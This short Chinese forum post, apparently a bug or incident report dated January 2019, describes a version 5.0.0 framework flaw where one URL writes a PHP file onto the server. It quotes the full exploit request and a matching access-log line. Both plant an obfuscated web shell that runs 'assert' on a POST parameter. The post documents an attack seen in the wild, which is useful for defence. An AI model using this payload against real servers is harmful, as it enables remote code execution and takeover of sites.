可怕 访问网址可在服务器上生成php文件

浏览:1628 发布日期:2019/01/16
5.0.0 - 致命 - 已处理
通过直接访问如下语句,可以直接在服务器上生成一个psrntjiseqs.php的文件:
http://域名/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&;vars[0]=file_put_contents&vars[1][]=psrntjiseqs.php&vars[1][]=%3C?php%20print(md5(222));$a=str_replace(%22vbnm%22,%22%22,%22asvbnmsert%22);@$a($_POST[qazw]);?%3E
日志文件记录如下:
120.92.119.142 - - [12/Jan/2019:23:24:00 +0800] "GET /index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=psrntjiseqs.php&vars[1][]=%3C?php%20print(md5(222));$a=str_replace(%22vbnm%22,%22%22,%22asvbnmsert%22);@$a($_POST[qazw]);?%3E HTTP/1.1" 200 197 "-" "python-requests/2.21.0" 120.92.119.142
评论(
后面还有条评论,点击查看>>